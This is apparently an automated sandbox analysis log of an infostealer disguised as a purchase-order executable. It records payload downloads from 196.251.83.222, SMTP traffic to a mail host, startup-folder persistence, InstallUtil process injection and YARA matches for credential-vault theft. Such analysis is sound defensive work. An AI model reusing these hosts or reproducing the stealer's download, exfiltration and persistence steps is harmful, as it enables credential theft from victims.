                      Source: purchase order T&B19-20PO128.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: purchase order T&B19-20PO128.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003B77000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1408053183.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003CAC000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003B77000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1408053183.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003DCB000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003CAC000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 4x nop then jmp 0633A128h0_2_0633A070
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 4x nop then jmp 0633A128h0_2_0633A06A
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 4x nop then jmp 05E06E58h18_2_05E06DA0
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 4x nop then jmp 05E06E58h18_2_05E06D98
                      Source: global trafficTCP traffic: 192.168.2.4:51693 -> 1.1.1.1:53
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Xqmvapt.wav HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Xqmvapt.wav HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 46.175.148.58 46.175.148.58
                      Source: Joe Sandbox ViewIP Address: 196.251.83.222 196.251.83.222
                      Source: global trafficTCP traffic: 192.168.2.4:51694 -> 46.175.148.58:25
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Xqmvapt.wav HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Xqmvapt.wav HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: mail.iaa-airferight.com
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1390243265.0000000002511000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1630701486.00000000027A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.83.222
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1390243265.0000000002511000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1630701486.00000000027A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://196.251.83.222/win32/panel/uploads/Xqmvapt.wav
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://196.251.83.222/win32/panel/uploads/Xqmvapt.wav/Invalid
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: powershell.exe, 0000000A.00000002.1288066510.0000000000631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0
                      Source: InstallUtil.exe, 0000000D.00000002.1580815664.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2387668752.0000000002E46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.iaa-airferight.com
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://ocsp.digicert.com0W
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1390243265.0000000002511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1288991396.0000000004731000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1630701486.00000000027A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: purchase order T&B19-20PO128.exe, ofg.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003518000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000359A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.1577207374.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 0000000A.00000002.1288991396.0000000004731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1390243265.000000000253F000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1630701486.00000000027CF000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmp, purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmp, ofg.exe, 00000012.00000002.1643604191.0000000003829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpack, SKTzxzsJw.cs.Net Code: sf6jJs8S

                      System Summary

                      barindex
                      Source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 18.2.ofg.exe.3e418f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 18.2.ofg.exe.3e418f0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 13.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: initial sampleStatic PE information: Filename: purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exeStatic file information: Suspicious name
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_0633F680 NtResumeThread,0_2_0633F680
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_0633F679 NtResumeThread,0_2_0633F679
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_05E0C530 NtResumeThread,18_2_05E0C530
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_05E0C529 NtResumeThread,18_2_05E0C529
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_00BE22570_2_00BE2257
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_00BECDC80_2_00BECDC8
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_00BE32980_2_00BE3298
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_00BE18D80_2_00BE18D8
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_00BE1D800_2_00BE1D80
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_00BE24B00_2_00BE24B0
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_00BEC4380_2_00BEC438
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_00BE1AD10_2_00BE1AD1
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_00BE1D6F0_2_00BE1D6F
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_063384E00_2_063384E0
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_0633D9580_2_0633D958
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_063367AD0_2_063367AD
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_063384D10_2_063384D1
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_063373E60_2_063373E6
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_063300060_2_06330006
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_0633B1B60_2_0633B1B6
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_06331C580_2_06331C58
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_0633AA780_2_0633AA78
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_06332B2F0_2_06332B2F
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_06339BBF0_2_06339BBF
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_0633D8500_2_0633D850
                      Source: C:\Users\user\Desktop\purchase order T&B19-20PO128.exeCode function: 0_2_0633D9480_2_0633D948
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0077107D10_2_0077107D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_012E9B3013_2_012E9B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_012E4A9013_2_012E4A90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_012ECDA813_2_012ECDA8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_012E3E7813_2_012E3E78
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_012E41C013_2_012E41C0
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_0262225718_2_02622257
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_0262CDC818_2_0262CDC8
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_0262329818_2_02623298
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_026218D818_2_026218D8
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_02621D8018_2_02621D80
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_0262C43818_2_0262C438
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_026224B018_2_026224B0
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_0262327718_2_02623277
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_02621AD118_2_02621AD1
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_02621D6F18_2_02621D6F
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_05E0A28818_2_05E0A288
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_05E0A27918_2_05E0A279
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_05E0520018_2_05E05200
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_05E0521018_2_05E05210
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_0647F9A818_2_0647F9A8
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_0646004018_2_06460040
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_0647E45018_2_0647E450
                      Source: C:\Users\user\AppData\Roaming\ofg.exeCode function: 18_2_0646000618_2_06460006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_010F937822_2_010F9378
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_010F9B3822_2_010F9B38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_010F4A9822_2_010F4A98
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_010FCDB022_2_010FCDB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_010F3E8022_2_010F3E80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_010F41C822_2_010F41C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_061C56E022_2_061C56E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_061C3F5022_2_061C3F50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_061CDD1822_2_061CDD18
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_061CBD0822_2_061CBD08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_061C9AE822_2_061C9AE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_061C2B0022_2_061C2B00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_061C8BA022_2_061C8BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_061C004022_2_061C0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_061C325022_2_061C3250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 22_2_061C500022_2_061C5000
                      Source: purchase order T&B19-20PO128.exeStatic PE information: invalid certificate
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003518000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7e5bb978-3a35-43a5-95fe-dd44d69d6a5a.exe4 vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1405239687.000000000566B000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXyacpauure.dll" vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1407669787.0000000005A38000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000000.1128865494.00000000001E4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCugsqgugi.exe4 vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1389140626.000000000087E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1390243265.000000000253F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003B77000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003A54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCugsqgugi.exe4 vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000359A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXyacpauure.dll" vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCugsqgugi.exe4 vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.0000000003AF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000038EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXyacpauure.dll" vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.000000000387D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1398770544.00000000036F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exe, 00000000.00000002.1408053183.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exeBinary or memory string: OriginalFilenameCugsqgugi.exe4 vs purchase order T&B19-20PO128.exe
                      Source: purchase order T&B19-20PO128.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.purchase order T&B19-20PO128.exe.3519550.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
